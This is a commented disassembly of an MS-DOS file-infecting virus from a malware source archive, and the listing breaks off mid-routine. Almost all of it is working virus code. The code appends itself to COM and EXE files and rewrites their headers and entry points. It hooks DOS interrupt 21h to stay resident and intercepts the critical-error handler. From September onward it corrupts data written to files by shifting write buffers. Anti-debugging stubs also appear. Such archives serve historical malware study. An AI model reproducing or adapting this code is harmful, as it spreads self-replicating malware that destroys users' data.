MalwareSourceCode/MSDOS/T-Index/Virus.MSDOS.Unknown.tenbytes.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

826 lines
30 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
start: mov ax,es ;0100 8C C0
add word ptr cs:[d_010C+2],ax ;segment relocation ;0102 2E: 01 06 010E
jmp dword ptr cs:[d_010C] ;jump into virus code ;0107 2E: FF 2E 010C
d_010C dw 0000,0138h ;dword=entry into virus ;010C 0000 0138
;<- duplicated code (aligning to 20h bytes)
db 0B8h,008h,000h,08Eh,0C0h,08Bh,00Eh,041h ;0110 B8 08 00 8E C0 8B 0E 41
db 003h,0BAh,028h,000h,02Eh,08Bh,01Eh,09Bh ;0118 03 BA 28 00 2E 8B 1E 9B
;..............................................................
; victim code
;..............................................................
org 1380h
;============================================================================
; Segment aligned virus segment begin
;----------------------------------------------------------------------------
;================================================================
; COM virus Entry
; (this code is present only in case *.COM infection)
;----------------------------------------------------------------
l_0000: push ds ;1380 1E
push cs ;1381 0E
pop ds ;1382 1F
lea si,cs:[4F7h] ;d_1877 = saved bytes ;1383 8D 36 04F7
mov di,100h ;1387.BF 0100
mov cx,20h ;138A B9 0020
rep movsb ;restore victim bytes ;138D F3/ A4
mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;138F 2E: C6 06 0349 FF
nop ;1395 90
pop ds ;1396 1F
lea ax,cs:[54Fh] ;l_18CF ;1397 8D 06 054F
jmp ax ;139B FF E0
;<--- duplicated fields d_033F - d_0347
dw 0020 ;139D 20 00
dw 05EAh ;139F EA 05
dw 0Bh ;13A1 0B 00
dw 28h ;13A3 28 00
dw 200h ;13A5 00 02
db 0 ;13A7 00
;===========================================================================
; Begin of file type independent virus code
;---------------------------------------------------------------------------
;================================================================
; Get/Set victim attribute
;----------------------------------------------------------------
s_13A8 proc near
mov dx,offset ds:[57Fh] ;file name ;13A8.BA 057F
mov ah,43h ;get/set file attrb ;13AB B4 43
int 21h ;13AD CD 21
retn ;13AF C3
s_13A8 endp
;================================================================
; Move file ptr to EOF
;----------------------------------------------------------------
s_13B0 proc near
xor cx,cx ;13B0 33 C9
xor dx,dx ;13B2 33 D2
mov ax,4202h ;move file ptr EOF+offset ;13B4 B8 4202
mov bx,cs:[9Bh] ;l_141B = file handle ;13B7 2E: 8B 1E 009B
int 21h ;13BC CD 21
retn ;13BE C3
s_13B0 endp
;================================================================
; Read 32 bytes into buffer
;----------------------------------------------------------------
s_13BF proc near
mov cx,20h ;13BF B9 0020
mov dx,4F7h ;l_1877-sav victim bytes;13C2.BA 04F7
mov bx,cs:[9Bh] ;l_141B = file handle ;13C5 2E: 8B 1E 009B
mov ah,3Fh ;read file ;13CA B4 3F
int 21h ;13CC CD 21
mov cx,ax ;bytes read ;13CE 8B C8
retn ;13D0 C3
s_13BF endp
;================================================================
; Write 32 B into file
;----------------------------------------------------------------
s_13D1 proc near
mov ax,8 ;switch off destruction ;13D1 B8 0008
mov es,ax ;13D4 8E C0
mov cx,20h ;13D6 B9 0020
mov dx,offset ds:[4F7h] ;l_1877 - saved bytes ;13D9.BA 04F7
mov bx,cs:[9Bh] ;l_141B = file handle ;13DC 2E: 8B 1E 009B
mov ah,40h ;write file cx=bytes ;13E1 B4 40
int 21h ;13E3 CD 21
mov cx,ax ;13E5 8B C8
retn ;13E7 C3
s_13D1 endp
;================================================================
; Calculate virus length
;----------------------------------------------------------------
s_13E8 proc near
mov ax,612h ;virus code length ;13E8 B8 0612
mov dx,28h ;file type depended code;13EB BA 0028
sub ax,dx ;13EE 2B C2
mov ds:[341h],ax ;l_16C1 const vcode len ;13F0 A3 0341
retn ;13F3 C3
s_13E8 endp
;================================================================
; Get/Set file daye & time
;----------------------------------------------------------------
s_13F4 proc near
mov bx,ds:[9Bh] ;l_141B = file handle ;13F4 8B 1E 009B
mov ah,57h ;get/set file date & time ;13F8 B4 57
int 21h ;13FA CD 21
retn ;13FC C3
s_13F4 endp
;================================================================
; Contamine File - master routine
;----------------------------------------------------------------
s_13FD proc near
mov byte ptr ds:[349h],0 ;d_16C9 (000h = EXE) ;13FD C6 06 0349 00
nop ;1402 90
mov al,0 ;1403 B0 00
call s_13A8 ;Get victim attribute ;1405 E8 FFA0
jc l_146A ;-> EXIT ;1408 72 60
mov ds:[33Fh],cx ;l_16BF oryg. file attr ;140A 89 0E 033F
mov cx,20h ;140E B9 0020
mov al,1 ;1411 B0 01
call s_13A8 ;Set victim attribute ;1413 E8 FF92
jc l_146A ;-> EXIT ;1416 72 52
jmp short l_1421 ;1418 EB 07
nop ;141A 90
d_009B dw 0005h ;file handle ;141B 05 00
d_009D dw 0400h ;141D 00 04
d_009F dw 057Fh ;filepath address ;141F 7F 05
l_1421: mov word ptr cs:[9Fh],057Fh ;l_141F := offset l_18FF;1421 2E C7 06 9F 00 7F 05
mov dx,ds:[9Fh] ;l_141F - file name ;1428 8B 16 009F
mov ax,400h ;142C B8 0400
mov ds:[9Dh],ax ;l_141D ;142F A3 009D
mov al,2 ;1432 B0 02
mov ah,3Dh ;open file, al=mode ;1434 B4 3D
int 21h ;1436 CD 21
mov word ptr ds:[9Bh],0FFFFh ;l_141B = file handle ;1438 C7 06 009B FFFF
jc l_1443 ;143E 72 03
mov ds:[9Bh],ax ;l_141B = file handle ;1440 A3 009B
l_1443: mov ax,ds:[9Bh] ;l_141B = file handle ;1443 A1 009B
cmp ax,0FFFFh ;1446 3D FFFF
je l_146A ;-> EXIT, open file err ;1449 74 1F
mov al,0 ;144B B0 00
call s_13F4 ;Get file daye & time ;144D E8 FFA4
jc l_148F ;-> err, close & exit ;1450 72 3D
mov ds:[0E8h],dx ;l_1468 = date ;1452 89 16 00E8
mov ds:[0EDh],cx ;l_146D = time ;1456 89 0E 00ED
call s_13BF ;Read 32 B into buffer ;145A E8 FF62
mov ax,word ptr ds:[4F7h] ;l_1877 first file word ;145D A1 04F7
cmp ax,5A4Dh ;'MZ' ? ;1460 3D 5A4D
je l_146F ;-> yes, EXE ;1463 74 0A
jmp l_1616 ;-> no, COM ;1465 E9 01AE
d_00E8 dw 0EF8h ;victim date ;1468 F8 0E
l_146A: jmp l_15C6 ;146A E9 0159
d_00ED dw 0001h ;victim time ;146D 01 00
;================================================================
; EXE file contamination
;----------------------------------------------------------------
l_146F: mov ax,word ptr ds:[509h] ;+12h = negative sum ;146F A1 0509
neg ax ;1472 F7 D8
cmp ax,word ptr ds:[4F9h] ;+2 = last page bytes ;1474 3B 06 04F9
je l_148F ;-> allready infected ;1478 74 15
mov ax,word ptr ds:[4FBh] ;+4 = pages in file ;147A A1 04FB
cmp ax,3 ;147D 3D 0003
jb l_148F ;-> file to small ;1480 72 0D
mov ax,word ptr ds:[4FFh] ;+8 = size of hdr (para);1482 A1 04FF
mov cl,4 ;1485 B1 04
shl ax,cl ;1487 D3 E0
mov ds:[347h],ax ;l_16C7 = size of header;1489 A3 0347
jmp short l_1492 ;148C EB 04
nop ;148E 90
l_148F: jmp l_15A8 ;148F E9 0116
l_1492: mov ax,word ptr ds:[50Bh] ;+14h = IP ;1492 A1 050B
mov word ptr ds:[5B4h],ax ;l_1934 ;1495 A3 05B4
mov word ptr ds:[50Bh],28h ;new IP value (l_13A8) ;1498 C7 06 050B 0028
call s_13B0 ;Move file ptr to EOF ;149E E8 FF0F
push ax ;14A1 50
push dx ;14A2 52
sub ax,ds:[347h] ;l_16C7=size of header ;14A3 2B 06 0347
sbb dx,0 ;14A7 83 DA 00
mov word ptr ds:[439h],ax ;l_17B9 ;14AA A3 0439
mov word ptr ds:[437h],dx ;l_17B7 ;14AD 89 16 0437
cmp dx,0 ;14B1 83 FA 00
ja l_14D3 ;-> more then 64KB ;14B4 77 1D
cmp ax,word ptr ds:[50Bh] ;+14h = IP ;14B6 3B 06 050B
ja l_14D3 ;-> more then 28h length;14BA 77 17
;<- EXE code length =< 28h
mov word ptr ds:[345h],0 ;l_16C5 ;14BC C7 06 0345 0000
mov bx,word ptr ds:[50Bh] ;14C2 8B 1E 050B
sub bx,ax ;28h - file length ;14C6 2B D8
mov ds:[343h],bx ;l_16C3 - aligning bytes;14C8 89 1E 0343
mov ds:[513h],bx ;+1Ch = ? ;14CC 89 1E 0513
jmp short l_1511 ;14D0 EB 3F
nop ;14D2 90
l_14D3: sub ax,word ptr ds:[50Bh] ;+14h = IP=28h ;14D3 2B 06 050B
sbb dx,0 ;14D7 83 DA 00
mov ds:[345h],ax ;d_16C5 ;14DA A3 0345
and ax,0Fh ;14DD 25 000F
cmp ax,0 ;14E0 3D 0000
jne l_14F9 ;-> need aligment ;14E3 75 14
mov word ptr ds:[343h],0 ;d_16C3 - aligning bytes;14E5 C7 06 0343 0000
mov ax,ds:[345h] ;d_16C5 ;14EB A1 0345
mov cx,10h ;14EE B9 0010
div cx ;14F1 F7 F1
mov ds:[345h],ax ;d_16C5 - segment of vir;14F3 A3 0345
jmp short l_1511 ;14F6 EB 19
db 90h ;14F8 90
;<---- need alignment
l_14F9: mov word ptr ds:[343h],10h ;d_16C3 - aligning bytes;14F9 C7 06 0343 0010
sub ds:[343h],ax ;d_16C3 - aligning bytes;14FF 29 06 0343
mov ax,ds:[345h] ;d_16C5 ;1503 A1 0345
mov cx,10h ;1506 B9 0010
div cx ;1509 F7 F1
add ax,1 ;+ alignment paragraph ;150B 05 0001
mov ds:[345h],ax ;d_16C5 - segment of vir;150E A3 0345
l_1511: mov ax,word ptr ds:[50Dh] ;+ 16h = CS ;1511 A1 050D
mov word ptr ds:[5B6h],ax ;d_1936 - victim CS ;1514 A3 05B6
mov ax,ds:[345h] ;d_16C5 ;1517 A1 0345
mov word ptr ds:[50Dh],ax ;+ 16h = CS ;151A A3 050D
push ax ;151D 50
mov ax,word ptr ds:[505h] ;+ 0Eh = SS ;151E A1 0505
mov word ptr ds:[5A1h],ax ;d_1921 - victim SS ;1521 A3 05A1
pop ax ;1524 58
mov word ptr ds:[505h],ax ;+ 0Eh = virus SS ;1525 A3 0505
mov ax,word ptr ds:[507h] ;+ 10h = SP ;1528 A1 0507
mov word ptr ds:[5A3h],ax ;d_1923 victim SP ;152B A3 05A3
lea ax,cs:[612h] ;End of virus ;152E 8D 06 0612
add ax,1Eh ;virus stack ;1532 05 001E
add ax,ds:[343h] ;d_16C3 - aligning bytes;1535 03 06 0343
mov word ptr ds:[507h],ax ;virus SP ;1539 A3 0507
call s_13E8 ;Calculate virus length ;153C E8 FEA9
pop dx ;<- victim EOF ;153F 5A
pop ax ;1540 58
add ax,ds:[341h] ;l_16C1 const vcode len ;1541 03 06 0341
adc dx,0 ;1545 83 D2 00
add ax,ds:[343h] ;d_16C3 - aligning bytes;1548 03 06 0343
adc dx,0 ;154C 83 D2 00
mov cx,200h ;page length ;154F B9 0200
div cx ;1552 F7 F1
cmp dx,0 ;1554 83 FA 00
je l_155A ;1557 74 01
inc ax ;1559 40
l_155A: mov word ptr ds:[4FBh],ax ;+4 - file len in pages ;155A A3 04FB
mov word ptr ds:[4F9h],dx ;+2 - last page length ;155D 89 16 04F9
neg dx ;1561 F7 DA
mov word ptr ds:[509h],dx ;+12h = negative sum ;1563 89 16 0509
mov cx,54Fh ;offset l_18CF-EXE entry;1567 B9 054F
mov word ptr ds:[50Bh],cx ;+14h - virus IP ;156A 89 0E 050B
cmp word ptr ds:[343h],3 ;d_16C3 - aligning bytes;156E 83 3E 0343 03
jb l_1580 ;1573 72 0B
;<- file begins with jump
mov cx,28h ;1575 B9 0028
sub cx,ds:[343h] ;d_16C3 - aligning bytes;1578 2B 0E 0343
mov word ptr ds:[50Bh],cx ;157C 89 0E 050B
l_1580: call s_15DF ;Set file pointer to BOF;1580 E8 005C
call s_13D1 ;Write 32 B into file ;1583 E8 FE4B
jc l_15A8 ;-> error, EXIT ;1586 72 20
mov cx,ds:[343h] ;d_16C3 - aligning bytes;1588 8B 0E 0343
sub cx,3 ;jmp instruction length ;158C 83 E9 03
mov ax,54Fh ;offset l_18CF=EXE entry;158F B8 054F
mov bx,28h ;beginning of code ;1592 BB 0028
sub ax,bx ;jmp distance ;1595 2B C3
add cx,ax ;aligning bytes ;1597 03 C8
mov word ptr ds:[54Ch],cx ;l_18CC = jump distance ;1599 89 0E 054C
call s_13B0 ;Move file ptr to EOF ;159D E8 FE10
call s_15C7 ;Align EOF to paragraphs;15A0 E8 0024
jc l_15A8 ;-> error, EXIT ;15A3 72 03
call s_15FE ;Write const part of vir;15A5 E8 0056
;================================================================
; End of contamination (common to EXE & COM)
;----------------------------------------------------------------
l_15A8: mov al,1 ;to set ;15A8 B0 01
mov dx,ds:ds:[0E8h] ;d_1468 victim date ;15AA 8B 16 00E8
mov cx,ds:ds:[0EDh] ;d_146D victim time ;15AE 8B 0E 00ED
call s_13F4 ;Set file daye & time ;15B2 E8 FE3F
mov bx,ds:[9Bh] ;l_141B = file handle ;15B5 8B 1E 009B
mov ah,3Eh ;close file ;15B9 B4 3E
int 21h ;15BB CD 21
mov al,1 ;to set ;15BD B0 01
mov cx,ds:[33Fh] ;l_16BF oryg. file attr ;15BF 8B 0E 033F
call s_13A8 ;Set victim attribute ;15C3 E8 FDE2
l_15C6: retn ;15C6 C3
;================================================================
; Align end of file to paragraphs
;----------------------------------------------------------------
s_15C7: mov ax,8 ;to switch off virus ;15C7 B8 0008
mov es,ax ;15CA 8E C0
mov cx,ds:[343h] ;l_16C3 - aligning bytes;15CC 8B 0E 0343
mov dx,54Bh ;offset d_18CB ;15D0.BA 054B
mov bx,cs:[9Bh] ;l_141B = file handle ;15D3 2E: 8B 1E 009B
mov ah,40h ;write file ;15D8 B4 40
int 21h ;15DA CD 21
mov cx,ax ;15DC 8B C8
retn ;15DE C3
;================================================================
; Set file pointer to BOF
;----------------------------------------------------------------
s_15DF: xor cx,cx ;15DF 33 C9
xor dx,dx ;15E1 33 D2
mov ax,4200h ;move file ptr, cx,dx=offset ;15E3 B8 4200
mov bx,cs:[9Bh] ;l_141B = file handle ;15E6 2E: 8B 1E 009B
int 21h ;15EB CD 21
retn ;15ED C3
;================================================================
; COM virus start code pattern
;----------------------------------------------------------------
d_026E: mov ax,es ;15EE 8C C0
add word ptr cs:[010Ch+2],ax ;15F0 2E: 01 06 010E
jmp dword ptr cs:[010Ch] ;15F5 2E: FF 2E 010C
d_027A dw 0 ;15FA 00 00
d_027C dw 0138h ;15FC 38 01
;================================================================
; Write constant part of virus
;----------------------------------------------------------------
s_15FE: mov ax,8 ;switch off virus ;15FE B8 0008
mov es,ax ;1601 8E C0
mov cx,ds:[341h] ;l_16C1 const.code leng.;1603 8B 0E 0341
mov dx,28h ;offset l_13A8 - vircode;1607.BA 0028
mov bx,cs:[9Bh] ;l_141B = file handle ;160A 2E: 8B 1E 009B
mov ah,40h ;write file ;160F B4 40
int 21h ;1611 CD 21
mov cx,ax ;1613 8B C8
retn ;1615 C3
;================================================================
; COM victim contamination
;----------------------------------------------------------------
l_1616: cmp word ptr ds:[4F9h],12Eh ;BOF+2 ;1616 81 3E 04F9 012E
je l_15A8 ;-> contamined, EXIT ;161C 74 8A
call s_13B0 ;Move file ptr to EOF ;161E E8 FD8F
cmp ax,3E8h ;1000 byte file length ;1621 3D 03E8
jb l_169F ;-> bellow, EXIT ;1624 72 79
add ax,100h ;add PSP ;1626 05 0100
adc dx,0 ;1629 83 D2 00
push ax ;162C 50
and ax,0Fh ;162D 25 000F
mov word ptr ds:[343h],0 ;l_16C3 aligning bytes ;1630 C7 06 0343 0000
cmp ax,0 ;1636 3D 0000
je l_1645 ;-> para aligned file ;1639 74 0A
mov word ptr ds:[343h],10h ;l_16C3 - aligning bytes;163B C7 06 0343 0010
sub ds:[343h],ax ;l_16C3 - aligning bytes;1641 29 06 0343
l_1645: pop ax ;1645 58
add ax,ds:[343h] ;l_16C3 aligning bytes ;1646 03 06 0343
adc dx,0 ;164A 83 D2 00
cmp dx,0 ;164D 83 FA 00
ja l_169F ;-> file to big, EXIT ;1650 77 4D
mov cl,4 ;1652 B1 04
shr ax,cl ;bytes 2 paragraphs ;1654 D3 E8
cmp word ptr ds:[343h],0 ;l_16C3 - aligning bytes;1656 83 3E 0343 00
mov ds:[27Ch],ax ;l_15FC virus segment ;165B A3 027C
mov word ptr ds:[27Ah],0 ;l_15FA virus entry ;165E C7 06 027A 0000
call s_15DF ;Set file pointer to BOF;1664 E8 FF78
mov ax,8 ;to switch off virus ;1667 B8 0008
mov es,ax ;166A 8E C0
mov cx,20h ;bytes to write ;166C B9 0020
mov dx,26Eh ;offset l_15EE ;166F.BA 026E
mov bx,cs:[9Bh] ;l_141B = file handle ;1672 2E: 8B 1E 009B
mov ah,40h ;write file ;1677 B4 40
int 21h ;1679 CD 21
mov cx,ax ;bytes written ;167B 8B C8
call s_13B0 ;Move file ptr to EOF ;167D E8 FD30
call s_15C7 ;write aligning bytes ;1680 E8 FF44
mov ax,8 ;switch off virus ;1683 B8 0008
mov es,ax ;1686 8E C0
mov cx,28h ;40 bytes ;1688 B9 0028
mov dx,322h ;offset l_16A2 ;168B .BA 0322
mov bx,cs:[9Bh] ;l_141B = file handle ;168E 2E: 8B 1E 009B
mov ah,40h ;write file ;1693 B4 40
int 21h ;1695 CD 21
mov cx,ax ;bytes written ;1697 8B C8
call s_13E8 ;Calculate virus length ;1699 E8 FD4C
call s_15FE ;Write const part of vir;169C E8 FF5F
l_169F: jmp l_15A8 ;close files, EXIT ;169F E9 FF06
s_13FD endp
;<-- COM type virus begin pattern
d_0322: push ds ;16A2 1E
push cs ;16A3 0E
pop ds ;16A4 1F
lea si,cs:[4F7h] ;16A5 8D 36 04F7
mov di,0100h ;16A9.BF 0100
mov cx,20h ;16AC B9 0020
rep movsb ;16AF F3/ A4
mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;16B1 2E: C6 06 0349 FF
nop ;16B7 90
pop ds ;16B8 1F
lea ax,cs:[54Fh] ;16B9 8D 06 054F
jmp ax ;16BD FF E0
;------ work area
d_033F dw 0020h ;oryg. file attr ;16BF 20 00
d_0341 dw 05EAh ;const virus code length;16C1 EA 05
d_0343 dw 0Bh ;aligning bytes ;16C3 0B 00
d_0345 dw 28h ;16C5 28 00
d_0347 dw 200h ;size of header ;16C7 00 02
d_0349 db 0 ;0=EXE, 0FFh=COM ;16C9 00
;================================================================
; init registers
;----------------------------------------------------------------
s_16CA proc near
xor si,si ;16CA 33 F6
xor di,di ;16CC 33 FF
xor ax,ax ;16CE 33 C0
xor dx,dx ;16D0 33 D2
xor bp,bp ;16D2 33 ED
retn ;16D4 C3
s_16CA endp
;================================================================
; int 24h handling routine (infection time active only)
;----------------------------------------------------------------
l_16D5: cmp di,0 ;16D5 83 FF 00
jne l_16DD ;16D8 75 03
mov al,3 ;ignore ;16DA B0 03
iret ;16DC CF
l_16DD: jmp dword ptr cs:[362h] ;L_16E2 = old int 24h ;16DD 2E: FF 2E 0362
d_0362 dw 0556h,0DF0h ;16E2 56 05 F0 0D
;================================================================
; Get int 24h
;----------------------------------------------------------------
s_16E6 proc near
cli ; Disable interrupts ;16E6 FA
xor bx,bx ;16E7 33 DB
mov es,bx ;16E9 8E C3
mov bx,es:[90h] ;int 24h offset ;16EB 26: 8B 1E 0090
mov word ptr cs:[362h],bx ;l_16E2 ;16F0 2E: 89 1E 0362
mov bx,es:[92h] ;int 24h segment ;16F5 26: 8B 1E 0092
mov word ptr cs:[362h+2],bx ;L_16E2+2 ;16FA 2E: 89 1E 0364
mov word ptr es:[90h],355h ;offset l_16D5 ;16FF 26: C7 06 0090 0355
mov es:[92h],ax ;int 24h segment := CS ;1706 26: A3 0092
sti ;170A FB
retn ;170B C3
s_16E6 endp
;================================================================
; Restore int 24h vector
;----------------------------------------------------------------
s_170C proc near
cli ;170C FA
xor bx,bx ;170D 33 DB
mov es,bx ;170F 8E C3
mov bx,word ptr cs:[362h] ;1711 2E: 8B 1E 0362
mov es:[90h],bx ;1716 26: 89 1E 0090
mov bx,word ptr cs:[362h+2] ;171B 2E: 8B 1E 0364
mov es:[92h],bx ;1720 26: 89 1E 0092
sti ;1725 FB
retn ;1726 C3
s_170C endp
;===============================================================
; write handle service routine (destruction routine)
;---------------------------------------------------------------
s_1727 proc near
push ax ;1727 50
push bx ;1728 53
push cx ;1729 51
push dx ;172A 52
push es ;172B 06
push ds ;172C 1E
push si ;172D 56
push di ;172E 57
mov ax,es ;172F 8C C0
cmp ax,8 ;1731 3D 0008
je l_1750 ;-> virus contamination ;1734 74 1A
cmp bx,4 ;1736 83 FB 04
jb l_1750 ;-> BIOS ;1739 72 15
mov ah,2Ah ;get date, cx=year, dx=mon/day ;173B B4 2A
int 21h ;173D CD 21
cmp dh,9 ;september ? ;173F 80 FE 09
jb l_1750 ;-> bellow ;1742 72 0C
pop di ;1744 5F
pop si ;1745 5E
pop ds ;1746 1F
pop es ;1747 07
pop dx ;1748 5A
pop cx ;1749 59
pop bx ;174A 5B
pop ax ;174B 58
add dx,0Ah ;shift buffer address ;174C 83 C2 0A
retn ;174F C3
l_1750: pop di ;1750 5F
pop si ;1751 5E
pop ds ;1752 1F
pop es ;1753 07
pop dx ;1754 5A
pop cx ;1755 59
pop bx ;1756 5B
pop ax ;1757 58
retn ;1758 C3
s_1727 endp
db 16 dup (0) ;not used ;1759 0010[00]
;================================================================
; Load & Execute service routine
;----------------------------------------------------------------
s_1769 proc near
push ax ;1769 50
push bx ;176A 53
push cx ;176B 51
push dx ;176C 52
push es ;176D 06
push ds ;176E 1E
push si ;176F 56
push di ;1770 57
mov si,dx ;file pathname ;1771 8B F2
mov ax,cs ;1773 8C C8
mov es,ax ;1775 8E C0
mov di,offset ds:[57Fh] ;l_18FF - victim name ;1777.BF 057F
mov cx,19h ;177A B9 0019
rep movsb ;copy victim name ;177D F3/ A4
call s_16E6 ;Get int 24h vector ;177F E8 FF64
mov ds,ax ;ds:=cs ;1782 8E D8
call s_13FD ;1784 E8 FC76
call s_170C ;Restore int 24h vector ;1787 E8 FF82
pop di ;178A 5F
pop si ;178B 5E
pop ds ;178C 1F
pop es ;178D 07
pop dx ;178E 5A
pop cx ;178F 59
pop bx ;1790 5B
pop ax ;1791 58
retn ;1792 C3
s_1769 endp
;================================================================
; New int 21h service routine
;----------------------------------------------------------------
;<---- 10 bytes to identify resident virus
d_0413: pushf ;1793 9C
cmp ah,40h ;write handle ? ;1794 80 FC 40
jne l_179F ;-> no ;1797 75 06
call s_1727 ;write handle service routine ;1799 E8 FF8B
jmp short l_17A7 ;179C EB 09
nop ;179E 90
l_179F: cmp ah,4Bh ;Load & Execute ? ;179F 80 FC 4B
jne l_17A7 ;-> no ;17A2 75 03
call s_1769 ;Load & Execute service routine ;17A4 E8 FFC2
l_17A7: popf ;17A7 9D
;================================================================
; Execute substituted code and jump into old int 21h service
;----------------------------------------------------------------
;<- four bytes from int 21h service
d_0428: cmp ah,51h ;17A8 80 FC 51
d_042B: je l_17B2 ;17AB 74 05
jmp dword ptr cs:[547h] ;17AD 2E: FF 2E 0547
l_17B2: jmp dword ptr cs:[49Dh] ;17B2 2E: FF 2E 049D
d_0437 dw 0000h,02A0h ;dword = code length ;17B7 00 00 A0 02
;================================================================
; Make virus resident
;----------------------------------------------------------------
s_17BB proc near
cli ;disable interrupts ;17BB FA
push es ;17BC 06
lea si,cs:[413h] ;l_1793 ;17BD 8D 36 0413
mov di,si ;17C1 8B FE
mov cx,9800h ;resident virus segment ;17C3 B9 9800
mov es,cx ;17C6 8E C1
mov cx,0Ah ;17C8 B9 000A
repe cmpsb ;17CB F3/ A6
cmp cx,0 ;17CD 83 F9 00
pop es ;17D0 07
jz l_181A ;-> allready resident ;17D1 74 47
mov bx,es:[84h] ;int 21h - offset ;17D3 26: 8B 1E 0084
mov ax,es:[86h] ;int 21h - segment ;17D8 26: A1 0086
mov word ptr ds:[549h],ax ;l_18C9 ;17DC A3 0549
mov word ptr ds:[49Fh],ax ;l_181F ;17DF A3 049F
mov di,bx ;17E2 8B FB
mov es,ax ;17E4 8E C0
mov cx,80h ;17E6 B9 0080
mov al,80h ;17E9 B0 80
l_17EB: repne scasb ;find byte 80h ;17EB F2/ AE
cmp cx,0 ;17ED 83 F9 00
je l_1870 ;-> not found, EXIT ;17F0 74 7E
cmp byte ptr es:[di],0FCh ;17F2 26: 80 3D FC
jne l_17EB ;-> find another place ;17F6 75 F3
;<- get four bytes from int 21h service
mov al,es:[di+2] ;17F8 26: 8A 45 02
mov byte ptr cs:[42Bh],al ;l_17AB ;17FC 2E: A2 042B
mov al,es:[di-1] ;1800 26: 8A 45 FF
mov byte ptr cs:[428h],al ;l_17A8 ;1804 2E: A2 0428
mov al,es:[di] ;1808 26: 8A 05
mov byte ptr cs:[429h],al ;l_17A8+1 ;180B 2E: A2 0429
mov al,es:[di+1] ;180F 26: 8A 45 01
mov byte ptr cs:[42Ah],al ;l_17A8+2 ;1813 2E: A2 042A
jmp short l_1821 ;1817 EB 08
nop ;1819 90
;<- allready resident
l_181A: jmp short l_1870 ;-> EXIT ;181A EB 54
nop ;181C 90
d_049D dw 140Dh ;address to jump1 into ;181D 0D 14
d_049F dw 0278h ;old int 21h segment ;181F 78 02
l_1821: mov ax,di ;1821 8B C7
add ax,4 ;next to conditional jmp;1823 05 0004
xor bx,bx ;1826 33 DB
mov bl,es:[di+3] ;jump length ;1828 26: 8A 5D 03
add ax,bx ;jump address ;182C 03 C3
mov word ptr ds:[49Dh],ax ;l_181D ;182E A3 049D
cmp byte ptr es:[di+3],80h ;1831 26: 80 7D 03 80
jb l_183E ;-> forward jump ;1836 72 06
;<- jump backwards
sub ax,100h ;minus carry ;1838 2D 0100
mov word ptr ds:[49Dh],ax ;l_181D ;183B A3 049D
l_183E: add di,4 ;second condition addrs ;183E 83 C7 04
mov word ptr ds:[547h],di ;1841 89 3E 0547
sub di,5 ;<- area to substitute ;1845 83 EF 05
push es ;1848 06
push di ;1849 57
mov dx,9800h ;resident virus segment ;184A BA 9800
mov word ptr cs:[4F5h],dx ;184D 2E: 89 16 04F5
mov es,dx ;1852 8E C2
xor si,si ;1854 33 F6
xor di,di ;1856 33 FF
mov cx,612h ;l_1380 -> l_1992 ;1858 B9 0612
rep movsb ;copy virus code ;185B F3/ A4
;<----- take control over int 21h
lea cx,cs:[413h] ;offset l_1793 ;185D 8D 0E 0413
mov word ptr ds:[4F3h],cx ;1861 89 0E 04F3
pop di ;1865 5F
pop es ;1866 07
mov cx,5 ;1867 B9 0005
lea si,cs:[4F2h] ;offset l_1792 ;186A 8D 36 04F2
rep movsb ;186E F3/ A4
l_1870: sti ;1870 FB
retn ;1871 C3
s_17BB endp
;<---- instruction pattern to write over int 21h code
d_04F2 db 0EAh ;JMP FAR 9800:l_1793 ;1872 EA
d_04F3 dw 0 ;:= offset l_1793 ;1873 00 00
d_04F5 dw 9800h ;resident virus segment ;1875 00 98
;================================================
; saved 32 victim bytes
;------------------------------------------------
d_04F7 db 0E9h,0FFh,11h ;1877 E9 FF 11
db 'Converted',0,0,0,0 ;187A 43 6F 6E 76 65 72
;1880 74 65 64 00 00 00 00
db 'MZ' ;1887 4D 5A
db 0EAh,01h,09h,00h,08h,00h ;1889 EA 01 09 00 08 00
db 20h,00h,00h,00h,0FFh,0FFh ;188F 20 00 00 00 FF FF
db 98h,00h ;1895 98 00 00
;-----------------------------------
db 48 dup (0) ;not used ;1897 0030[00]
d_0547 dw 146Ch ;address to jump2 into ;18C7 6C 14
d_0549 dw 0278h ;old int 21h segment ;18C9 78 02
;<------ code writed to in case of paragraf alignement
db 0E9h ;jmp l_18CF ;18CB E9
d_054C dw 052Ch ;distance of jump ;18CC 2C 05
db 0 ;18CE 00
;================================================================
; EXE virus entry
;----------------------------------------------------------------
l_18CF: push bx ;18CF 53
push cx ;18D0 51
push es ;18D1 06
push ds ;18D2 1E
pushf ;18D3 9C
mov ax,cs ;18D4 8C C8
mov ds,ax ;18D6 8E D8
call s_1938 ;make virus resident ;18D8 E8 005D
cmp byte ptr ds:[349h],0FFh ;l_16C9 (0FFh=COM) ;18DB 80 3E 0349 FF
je l_18E5 ;18E0 74 03
jmp short l_1953 ;-> ? ;18E2 EB 6F
nop ;18E4 90
;================================================================
; End of virus code - file *.COM
;----------------------------------------------------------------
l_18E5: popf ;18E5 9D
pop ds ;18E6 1F
pop es ;18E7 07
pop cx ;18E8 59
pop bx ;18E9 5B
mov word ptr cs:[5B4h],100h ;l_1934 = victim IP ;18EA 2E: C7 06 05B4 0100
mov ax,es ;18F1 8C C0
mov word ptr cs:[5B6h],ax ;l_1936 = victim CS ;18F3 2E: A3 05B6
call s_16CA ;init registers ;18F7 E8 FDD0
jmp dword ptr cs:[5B4h] ;l_1934 -> run victim ;18FA 2E: FF 2E 05B4
;<--- victim name
d_057F db 'A:\SYS.COM' ;18FF 41 3A 5C 53 59 53
;1905 2E 43 4F 4D
db 0,'XE',0,'E',0 ;1909 00 58 45 00 45 00
db 9 dup (0) ;190F 0009[00]
;================================================================
; ANTYDEBUG - make virus resident
;----------------------------------------------------------------
s_1918 proc near
cmp ax,3000h ;1918 3D 3000
jne l_1925 ;-> int 3 ;191B 75 08
call s_17BB ;-> make virus resident ;191D E8 FE9B
retn ;1920 C3
s_1918 endp
d_05A1 dw 002Ah ;victim SS (rel) ;1921 2A 00
d_05A3 dw 1388h ;victim SP ;1923 88 13
;================================================================
; ANTYDEBUG - call int 3 (Breakpoint)
;----------------------------------------------------------------
s_1925 proc near
l_1925: mov ax,3000h ;Flag register ;1925 B8 3000
